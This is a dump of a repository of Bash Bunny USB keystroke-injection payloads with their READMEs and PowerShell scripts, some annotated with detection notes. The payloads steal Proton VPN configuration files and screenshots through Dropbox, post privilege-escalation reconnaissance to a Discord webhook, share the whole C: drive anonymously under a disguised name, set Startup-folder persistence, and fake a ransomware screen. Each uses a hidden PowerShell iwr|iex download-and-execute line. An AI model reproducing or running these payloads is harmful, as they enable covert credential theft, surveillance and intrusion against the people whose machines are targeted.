### Dependencies
* Discord Webhook or other service that uses webhooks
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A command will be entered in the command prompt to search for unquoted service paths so you can later exploit them for priv esc
```
wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Priv-Paths/payload.txt
================================================
REM Title: Priv-Paths
REM Author: atomiczsec
REM Description: A payload to enumerate unquoted service paths for privilege escalation and send to a discord webhook.
REM Target: Windows 10
REM Flow: open cmd from the Run dialog, change to %HOMEPATH%, list services with wmic, keep the lines that
REM contain "Auto", drop the lines that contain "C:\Windows\" or a double quote, save the rest to p.txt,
REM post p.txt to the webhook with curl.exe, delete p.txt and close the window.
REM Detection: wmic.exe "service get ... pathname" followed by findstr filters, then curl.exe posting a file,
REM all from an interactive cmd session started through the Run dialog.
REM Hardening: quote the executable path of every service whose path contains spaces.
Q DELAY 3000
Q GUI r
Q DELAY 1000
Q STRING cmd
Q ENTER
Q DELAY 500
Q STRING cd %HOMEPATH%
Q ENTER
Q DELAY 1000
Q STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
Q ENTER
Q DELAY 1000
Q STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK
Q ENTER
Q DELAY 200
Q STRING del p.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
================================================
FILE: BashBunny/payloads/Proton-Hog/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Proton+Hog!+😈&amp;center=true&amp;size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Proton-Hog
A payload to exfiltrate the user config file of Proton VPN, which contains keys and usernames as well as account information.
## Description
This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file
Then dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Proton-Hog/payload.txt
================================================
REM Title: Proton-Hog
REM Author: atomiczsec
REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as account information.
REM Target: Windows 10
REM Flow: wait 2 s, open the Run dialog (GUI r), wait 0.5 s, type the PowerShell one-liner, press ENTER.
REM The one-liner starts PowerShell with a hidden window (-w h), no profile (-NoP), non-interactive (-NonI)
REM and execution policy Bypass (-ep Bypass); it fetches a script with iwr and executes the response with iex.
REM Detection: a command typed into the Run dialog is recorded under the user's RunMRU registry key, and the
REM powershell.exe command line (hidden window, Bypass, iwr followed by iex) is visible where process
REM command-line logging is enabled.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/Proton-Hog/s.ps1
================================================
function DropBox-Upload {
# Sends one local file to Dropbox with a single POST to the /2/files/upload endpoint,
# authenticated by the bearer token hard-coded below.
#   SourceFilePath (alias -f): local file to send; mandatory, may come from the pipeline.
# The Invoke-RestMethod result is emitted to the caller; nothing here catches a failed request.
# Detection: outbound HTTPS from powershell.exe to content.dropboxapi.com carrying a file body
# is the network-visible step of this script.
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
# Remote name is the leaf of the local path, placed directly under "/".
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# Dropbox-API-Arg JSON: mode "add" with autorename, so an existing remote file is kept and the new one is renamed.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
# The file content is the raw request body (-InFile).
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
# Test the path to the ProtonVPN directory and, if it is available, change directory to where the user.config is stored
# Response note: when this script has run on a host, treat the contents of the Proton VPN user.config
# as exposed and rotate whatever credentials it holds.
if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) {
try {
Write-Host "The VPN folder has not been found. "
}
catch {
# Re-throws only the message text of whatever Write-Host raised.
throw $_.Exception.Message
}
}
else {
$protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN"
cd $protonVpnPath
# Enter the child whose name matches "ProtonVPN.exe", then whatever child item that directory holds.
# NOTE(review): presumably one per-version subdirectory sits there; the script does not check - confirm.
Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd
Get-ChildItem | cd
# Upload user.config to dropbox
# The path is relative, so it resolves against the directory entered above.
DropBox-Upload -f "user.config"
}
================================================
FILE: BashBunny/payloads/Pwn-Drive/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Pwn+Drive!+😈&amp;center=true&amp;size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Pwn-Drive
A payload to share the victims "C:" drive to the network.
## Description
This payload will share the entire victims "C:" drive to the entire network for further exploitation.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Pwn-Drive/c.ps1
================================================
#Pwn-Drive
# Opens the host to the local network and shares the root of C: under the share name "Windows Update".
# Every step changes machine-wide state: firewall rules, two HKLM registry values and the SMB share list.
# Detection and recovery: look for an SMB share named "Windows Update" whose path is C:\ (Get-SmbShare),
# for the two registry values written below, and for the firewall changes; remove the share and restore
# the registry values and firewall state from a known baseline.
#Enable Network Discovery
netsh advfirewall firewall set rule group=”network discovery” new enable=yes
#Enable File and Print
# Uses the legacy "netsh firewall" context, applied to all profiles.
netsh firewall set service type=fileandprint mode=enable profile=all
#Setting Registry Values for allowing access to drive without credentials
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force
#Sharing the Drive
# The share name imitates a system component; the shared path is the whole system drive.
New-SmbShare -Name "Windows Update" -Path "C:\"
================================================
FILE: BashBunny/payloads/Pwn-Drive/payload.txt
================================================
REM Title: Pwn-Drive
REM Author: atomiczsec
REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
REM Target: Windows 10
REM Review note: the keystrokes open the Run dialog (GUI r) and type a single
REM PowerShell command that fetches a remote script with iwr and hands the
REM response to iex, so this line itself writes no script file to disk.
REM Defensive view: text typed into the Run dialog is kept in the user's
REM RunMRU registry key, and PowerShell script block logging (event 4104),
REM where enabled, records what iex executed. A hidden window, execution-policy
REM bypass and iwr/iex on one command line is a common detection signature.
REM Restricting unknown USB HID devices stops the keystroke injection itself.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/RanFunWare/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=RanFunWare!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# RanFunWare
A payload to prank your friends into thinking their computer got hit with ransomware.
## Description
This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable)
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/RanFunWare/payload.txt
================================================
REM Title: RanFunWare
REM Author: atomiczsec
REM Description: This payload will prank your target into thinking their machine got hit with ransomware.
REM Target: Windows 10
REM Review note: the keystrokes open the Run dialog (GUI r) and type a single
REM PowerShell command that fetches a remote script with iwr and hands the
REM response to iex, so this line itself writes no script file to disk.
REM Defensive view: the typed command stays in the user's RunMRU registry key,
REM and PowerShell script block logging (event 4104), where enabled, records
REM the script that iex ran.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/RanFunWare/r.ps1
================================================
# Purpose: hides the desktop icons, replaces the wallpaper with a downloaded
# image and shows one warning dialog. Nothing in this script encrypts, deletes
# or moves files; the changes are cosmetic and reversible.
# Review note (helpdesk / triage): to undo, set HideIcons back to 0 under the
# key below, restart explorer.exe, pick the previous wallpaper again and delete
# C:\temp\test.jpg.
#Hides Desktop Icons
$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1
# Stops explorer.exe so that the HideIcons value is picked up when the shell starts again.
Get-Process "explorer"| Stop-Process
#Changes Background
#URL For the Image of your choice (Wanna Cry Ransomware Background)
$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg"
# The image is written to a fixed path; that file and the outbound request are the on-host traces.
Invoke-WebRequest $url -OutFile C:\temp\test.jpg
# C# source compiled at run time by Add-Type: a thin P/Invoke wrapper around
# user32!SystemParametersInfo, called with action 20 (SetDesktopWallpaper) and
# the flags UpdateIniFile | SendWinIniChange.
$setwallpapersrc = @"
using System.Runtime.InteropServices;
public class Wallpaper
{
public const int SetDesktopWallpaper = 20;
public const int UpdateIniFile = 0x01;
public const int SendWinIniChange = 0x02;
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
public static void SetWallpaper(string path)
{
SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange);
}
}
"@
Add-Type -TypeDefinition $setwallpapersrc
[Wallpaper]::SetWallpaper("C:\temp\test.jpg")
#Pop Up Message
# MsgBox: shows a WPF message box.
#   -message / -m  (mandatory) text shown in the dialog body
#   -title   / -t  window title; a single space is used when omitted
#   -button  / -b  one of OK, OKCancel, YesNoCancel, YesNo; OK when omitted
#   -image   / -i  one of None, Hand, Question, Warning, Asterisk; None when omitted
# The value returned by [System.Windows.MessageBox]::Show is passed through to the caller.
function MsgBox {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True)]
[Alias("m")]
[string]$message,
[Parameter (Mandatory = $False)]
[Alias("t")]
[string]$title,
[Parameter (Mandatory = $False)]
[Alias("b")]
[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')]
[string]$button,
[Parameter (Mandatory = $False)]
[Alias("i")]
[ValidateSet('None','Hand','Question','Warning','Asterisk')]
[string]$image
)
# Loads the WPF assemblies that provide System.Windows.MessageBox.
Add-Type -AssemblyName PresentationCore,PresentationFramework
# Fill in defaults for the optional parameters.
if (!$title) {$title = " "}
if (!$button) {$button = "OK"}
if (!$image) {$image = "None"}
[System.Windows.MessageBox]::Show($message,$title,$button,$image)
}
# The dialog result is not captured, so it is written to the output stream.
MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning
================================================
FILE: BashBunny/payloads/Screen-Shock/I.bat
================================================
@echo off
REM Launcher: changes to %USERPROFILE%\AppData\Roaming and runs c.ps1 from there
REM in a hidden PowerShell window with the execution policy bypassed.
REM Review note (defensive): the README for this payload says this file is
REM placed in the user's Startup folder, so it runs at every logon. A .bat in
REM the Startup folder that starts a hidden PowerShell -File is the persistence
REM artifact to look for; removing it and the c.ps1 it points at ends the loop.
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause
================================================
FILE: BashBunny/payloads/Screen-Shock/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Screen+Shock!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Screen-Shock
This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistence and execute c.ps1 on reboot/startup
**c.ps1** will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds
The contents will then be sent to the DropBox for viewing pleasure
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Dropbox
* Windows 10
* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Screen-Shock/c.ps1
================================================
# DropBox-Upload: uploads one local file to the root of a Dropbox account.
#   -SourceFilePath / -f  (mandatory, accepts pipeline input) path of the file to send.
# The remote name is the leaf of the local path; "autorename" is set, so an
# existing remote file is not overwritten. The request is a POST to
# content.dropboxapi.com/2/files/upload authorised by a bearer token that is
# hard-coded in the script.
# Review note (defensive): a recovered copy of this script contains the access
# token in clear text, which identifies the receiving account and can be
# reported to the provider for revocation. On the network side the signal is
# powershell.exe posting to content.dropboxapi.com at a fixed interval.
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# JSON argument for the upload endpoint, passed in the Dropbox-API-Arg header.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
# Main loop, no exit condition: it runs until the PowerShell process is ended.
# Each pass captures one bitmap covering all attached screens, saves it to a
# fixed file name in the user's Temp directory (overwriting the previous
# capture), waits 15 seconds and uploads it.
# Review note (defensive): the on-disk trace is <COMPUTERNAME>-Capture.png in
# %USERPROFILE%\AppData\Local\Temp, rewritten on every pass by a long-lived
# hidden powershell.exe.
while(1){
Add-Type -AssemblyName System.Windows.Forms,System.Drawing
$screens = [Windows.Forms.Screen]::AllScreens
# Smallest top/left and largest right/bottom over all screens.
$top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum
$left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum
# Despite their names, $width and $height hold the right and bottom edges passed to FromLTRB.
$width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum
$height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum
$bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)
$bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height)
$graphics = [Drawing.Graphics]::FromImage($bmp)
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
$bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png")
# Release the GDI+ objects before the next pass.
$graphics.Dispose()
$bmp.Dispose()
start-sleep -Seconds 15
"$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload
}
================================================
FILE: BashBunny/payloads/Screen-Shock/payload.txt
================================================
REM Title: Screen-Shock
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
REM Target: Windows 10
REM Review note: the typed command writes two downloaded files - l.bat into the
REM user's Startup folder and c.ps1 into %APPDATA% - and then starts c.ps1.
REM Defensive view: creation of a .bat in
REM ...\Start Menu\Programs\Startup by powershell.exe is the persistence event
REM to alert on; the same two paths are where to look during clean-up.
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
================================================
FILE: BashBunny/payloads/Screen-Shock/placeholder
================================================
================================================
FILE: BashBunny/payloads/Spotify-Spy/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Spotify+Spy!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Spotify-Spy
This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
## Description
Have you ever been too afraid to ask your co-worker what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their Spotify username for you so you don't have to socially interact with anyone!
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
